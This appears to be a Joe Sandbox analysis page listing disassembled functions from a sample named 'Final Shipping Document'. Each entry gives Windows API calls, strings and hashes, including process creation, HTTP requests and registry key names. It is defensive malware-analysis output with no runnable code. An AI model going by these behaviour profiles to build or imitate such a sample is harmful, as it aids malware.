                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharUpper
                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                            • API String ID: 1256254125-909552448
                                                            • Opcode ID: 5d5fee430420bec35822f1e92f4ad70b6a4f1f4d1c5e7b7705f71f4e70825798
                                                            • Instruction ID: b85f112ac694170af4ec1ec6d433e4d957815dc81f0e916352fac53878c2b00e
                                                            • Opcode Fuzzy Hash: 5d5fee430420bec35822f1e92f4ad70b6a4f1f4d1c5e7b7705f71f4e70825798
                                                            • Instruction Fuzzy Hash: F071043261413A8BCF20DE7CEDD16BE3391AF61794B250628F87697684EA71CF44D3A0
                                                            Function 00C3833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C3835A
                                                            • _wcslen.LIBCMT ref: 00C3836E
                                                            • _wcslen.LIBCMT ref: 00C38391
                                                            • _wcslen.LIBCMT ref: 00C383B4
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00C383F2
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00C35BF2), ref: 00C3844E
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C38487
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00C384CA
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00C38501
                                                            • FreeLibrary.KERNEL32(?), ref: 00C3850D
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C3851D
                                                            • DestroyIcon.USER32(?,?,?,?,?,00C35BF2), ref: 00C3852C
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00C38549
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00C38555
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 799131459-1154884017
                                                            • Opcode ID: a4a859d1e5bb8a2a18656546bf5ced81b4b8318f106733223a9bc22291616931
                                                            • Instruction ID: 7c765b7232646c0b24710d88715358efab5287636242f9de66bd07d82b2ce650
                                                            • Opcode Fuzzy Hash: a4a859d1e5bb8a2a18656546bf5ced81b4b8318f106733223a9bc22291616931
                                                            • Instruction Fuzzy Hash: B061F072524315BEEB14DF64CC81FBE77A8FB08711F104649F825E61D1DBB4AA88CBA0
                                                            Function 00BA7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 0-1645009161
                                                            • Opcode ID: 0de7731c00efe36f7fc78320688a5b4fe76752923bde860cc59801c49c0f972d
                                                            • Instruction ID: 2805e287fdf04938fd2144047bff4de9e001ad9038c152a334958bbe031baf60
                                                            • Opcode Fuzzy Hash: 0de7731c00efe36f7fc78320688a5b4fe76752923bde860cc59801c49c0f972d
                                                            • Instruction Fuzzy Hash: 9381C671A58605BBDB20AF61DC82FBE37E8EF16300F0440A5F905AA192EF70DE11D7A1
                                                            Function 00C05A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 00C05A2E
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C05A40
                                                            • SetWindowTextW.USER32(?,?), ref: 00C05A57
                                                            • GetDlgItem.USER32(?,000003EA), ref: 00C05A6C
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C05A72
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00C05A82
                                                            • SetWindowTextW.USER32(00000000,?), ref: 00C05A88
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C05AA9
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C05AC3
                                                            • GetWindowRect.USER32(?,?), ref: 00C05ACC
                                                            • _wcslen.LIBCMT ref: 00C05B33
                                                            • SetWindowTextW.USER32(?,?), ref: 00C05B6F
                                                            • GetDesktopWindow.USER32 ref: 00C05B75
                                                            • GetWindowRect.USER32(00000000), ref: 00C05B7C
                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C05BD3
                                                            • GetClientRect.USER32(?,?), ref: 00C05BE0
                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C05C05
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C05C2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                            • String ID:
                                                            • API String ID: 895679908-0
                                                            • Opcode ID: 87234de1aedc3e52df1c688288e017486de760ab6dc99006af9358d6204935c5
                                                            • Instruction ID: 22487894bf3272f3d08bf58a37f36066a0a69083b17a66c0c77b9e7c07cb6817
                                                            • Opcode Fuzzy Hash: 87234de1aedc3e52df1c688288e017486de760ab6dc99006af9358d6204935c5
                                                            • Instruction Fuzzy Hash: 72713A31A00B09AFDB20DFA9CE86BAFBBF5FF48704F104518E556A25A0D775AA44CF50
                                                            Function 00BC00C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00BC00C6
                                                              • Part of subcall function 00BC00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00C7070C,00000FA0,1A6B96DF,?,?,?,?,00BE23B3,000000FF), ref: 00BC011C
                                                              • Part of subcall function 00BC00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00BE23B3,000000FF), ref: 00BC0127
                                                              • Part of subcall function 00BC00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00BE23B3,000000FF), ref: 00BC0138
                                                              • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00BC014E
                                                              • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00BC015C
                                                              • Part of subcall function 00BC00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00BC016A
                                                              • Part of subcall function 00BC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC0195
                                                              • Part of subcall function 00BC00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00BC01A0
                                                            • ___scrt_fastfail.LIBCMT ref: 00BC00E7
                                                              • Part of subcall function 00BC00A3: __onexit.LIBCMT ref: 00BC00A9
                                                            Strings
                                                            • WakeAllConditionVariable, xrefs: 00BC0162
                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00BC0122
                                                            • InitializeConditionVariable, xrefs: 00BC0148
                                                            • kernel32.dll, xrefs: 00BC0133
                                                            • SleepConditionVariableCS, xrefs: 00BC0154
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                            • API String ID: 66158676-1714406822
                                                            • Opcode ID: 8289751aa575cb93679fd19d55f7cfdb1f71970195cc3767b28e608bf5e72035
                                                            • Instruction ID: 078f16327c306fc38f25063f32f91889545f026190e70dfff4a8e25df0195acb
                                                            • Opcode Fuzzy Hash: 8289751aa575cb93679fd19d55f7cfdb1f71970195cc3767b28e608bf5e72035
                                                            • Instruction Fuzzy Hash: 7321A132A64711EBE7116BA4AC4AF7EB3E4EB05B61F14457DF805B22A1DBB49C009B90
                                                            Function 00C030F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 176396367-1603158881
                                                            • Opcode ID: d0de0ffb0cbafa89d54305b8b151b1311e34c73fb4ce45a86e869b2c480a833b
                                                            • Instruction ID: 7437df278c1d476c453296e9fca6745ebed2e662c1f650c28996565447c6ba53
                                                            • Opcode Fuzzy Hash: d0de0ffb0cbafa89d54305b8b151b1311e34c73fb4ce45a86e869b2c480a833b
                                                            • Instruction Fuzzy Hash: 35E1D731A00566ABCF249FA4C891BEDBBB8BF54710F648169E466B72D0DB30AF45C790
                                                            Function 00C144C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(00000000,00000000,00C3CC08), ref: 00C14527
                                                            • _wcslen.LIBCMT ref: 00C1453B
                                                            • _wcslen.LIBCMT ref: 00C14599
                                                            • _wcslen.LIBCMT ref: 00C145F4
                                                            • _wcslen.LIBCMT ref: 00C1463F
                                                            • _wcslen.LIBCMT ref: 00C146A7
                                                              • Part of subcall function 00BBF9F2: _wcslen.LIBCMT ref: 00BBF9FD
                                                            • GetDriveTypeW.KERNEL32(?,00C66BF0,00000061), ref: 00C14743
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                            • API String ID: 2055661098-1000479233
                                                            • Opcode ID: 0cb67a1790e02684abfb5a829f695a1436afde423ad9b8534b640b8626155702
                                                            • Instruction ID: 86ae4e705645a4700cf6cc3a452d3499ad294ea956a759fd78b421093dd27b6a
                                                            • Opcode Fuzzy Hash: 0cb67a1790e02684abfb5a829f695a1436afde423ad9b8534b640b8626155702
                                                            • Instruction Fuzzy Hash: 7AB1E3716083029FC718DF28C890AAEB7E5AFA7764F50491DF4A6C7291D730DA84DB92
                                                            Function 00C2AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C2B198
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1B0
                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B1D4
                                                            • _wcslen.LIBCMT ref: 00C2B200
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B214
                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C2B236
                                                            • _wcslen.LIBCMT ref: 00C2B332
                                                              • Part of subcall function 00C105A7: GetStdHandle.KERNEL32(000000F6), ref: 00C105C6
                                                            • _wcslen.LIBCMT ref: 00C2B34B
                                                            • _wcslen.LIBCMT ref: 00C2B366
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C2B3B6
                                                            • GetLastError.KERNEL32(00000000), ref: 00C2B407
                                                            • CloseHandle.KERNEL32(?), ref: 00C2B439
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2B44A
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2B45C
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C2B46E
                                                            • CloseHandle.KERNEL32(?), ref: 00C2B4E3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                            • String ID:
                                                            • API String ID: 2178637699-0
                                                            • Opcode ID: 561fac745eed64d084ac4b917bce29e9e78ba131f06c8f8e854ed4c29c40539c
                                                            • Instruction ID: c38bfcd62e1858ffa6c49f6607251937f2b22ecb3598d53c8d08e97351ce09b1
                                                            • Opcode Fuzzy Hash: 561fac745eed64d084ac4b917bce29e9e78ba131f06c8f8e854ed4c29c40539c
                                                            • Instruction Fuzzy Hash: 2CF1AD71608310DFC714EF24D891B6EBBE1AF85310F18859DF8A99B2A2DB71ED44CB52
                                                            Function 00BA326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemCount.USER32(00C71990), ref: 00BE2F8D
                                                            • GetMenuItemCount.USER32(00C71990), ref: 00BE303D
                                                            • GetCursorPos.USER32(?), ref: 00BE3081
                                                            • SetForegroundWindow.USER32(00000000), ref: 00BE308A
                                                            • TrackPopupMenuEx.USER32(00C71990,00000000,?,00000000,00000000,00000000), ref: 00BE309D
                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00BE30A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                            • String ID: 0
                                                            • API String ID: 36266755-4108050209
                                                            • Opcode ID: 0687da9bcac0de0843858e06cbb97c22fe451af00b0ae5cef704149b0c22a6d7
                                                            • Instruction ID: fe53a2c25614156acc7c4bf2ee98a479f51a56ce45ac803f978f78ca07143f34
                                                            • Opcode Fuzzy Hash: 0687da9bcac0de0843858e06cbb97c22fe451af00b0ae5cef704149b0c22a6d7
                                                            • Instruction Fuzzy Hash: 86713531644255BEEB218F25CC89FAEBFE8FF01724F244256F5246A1E0C7B1AD50DB90
                                                            Function 00C36CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?), ref: 00C36DEB
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00C36E5F
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00C36E81
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C36E94
                                                            • DestroyWindow.USER32(?), ref: 00C36EB5
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00BA0000,00000000), ref: 00C36EE4
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C36EFD
                                                            • GetDesktopWindow.USER32 ref: 00C36F16
                                                            • GetWindowRect.USER32(00000000), ref: 00C36F1D
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00C36F35
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00C36F4D
                                                              • Part of subcall function 00BB9944: GetWindowLongW.USER32(?,000000EB), ref: 00BB9952
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 2429346358-3619404913
                                                            • Opcode ID: 820ed37793fa7ddc9e5bcb9a55b26bd82511829509e0f38df52e62aec125d10f
                                                            • Instruction ID: ecb4a264474a3836ede353bf3ba75e39bb479f5bdce105510deda89ddfe3d88c
                                                            • Opcode Fuzzy Hash: 820ed37793fa7ddc9e5bcb9a55b26bd82511829509e0f38df52e62aec125d10f
                                                            • Instruction Fuzzy Hash: 38718B74114240AFDB21CF18DC84FAABBF9FB89304F04441DFA9997260C770EA4ACB21
                                                            Function 00C3911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • DragQueryPoint.SHELL32(?,?), ref: 00C39147
                                                              • Part of subcall function 00C37674: ClientToScreen.USER32(?,?), ref: 00C3769A
                                                              • Part of subcall function 00C37674: GetWindowRect.USER32(?,?), ref: 00C37710
                                                              • Part of subcall function 00C37674: PtInRect.USER32(?,?,00C38B89), ref: 00C37720
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C391B0
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C391BB
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00C391DE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00C39225
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00C3923E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C39255
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00C39277
                                                            • DragFinish.SHELL32(?), ref: 00C3927E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00C39371
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                            • API String ID: 221274066-3440237614
                                                            • Opcode ID: 24491be41074af962b8a24d1ca5a8419c8d0dfdfb997eec07551ecb23728d72c
                                                            • Instruction ID: f2e9c7c490e031dbe03e20d206f658ee4b401ecc3f93a3e6d10b8135ad25e598
                                                            • Opcode Fuzzy Hash: 24491be41074af962b8a24d1ca5a8419c8d0dfdfb997eec07551ecb23728d72c
                                                            • Instruction Fuzzy Hash: 60616B71108301AFD701EF64DC85EAFBBF8EF89750F004A6DF595922A1DB709A49CB52
                                                            Function 00C1C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C1C4B0
                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C1C4C3
                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C1C4D7
                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C1C4F0
                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C1C533
                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C1C549
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C1C554
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C1C584
                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C1C5DC
                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C1C5F0
                                                            • InternetCloseHandle.WININET(00000000), ref: 00C1C5FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                            • String ID:
                                                            • API String ID: 3800310941-3916222277
                                                            • Opcode ID: a4354c69d8a8892ddc03aa99dcdb748f17e48ce87db77ab58a795ecb437507d3
                                                            • Instruction ID: 877502e33412a9674532a65e17646927b15894f8579639fddd8a2e966813764d
                                                            • Opcode Fuzzy Hash: a4354c69d8a8892ddc03aa99dcdb748f17e48ce87db77ab58a795ecb437507d3
                                                            • Instruction Fuzzy Hash: B0513AB1540208BFDB218F65C9C8BBF7BBDEB0A754F004419F956E6210DB34EA84AB60
                                                            Function 00C3856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00C38592
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385A2
                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385AD
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385BA
                                                            • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00C385C8
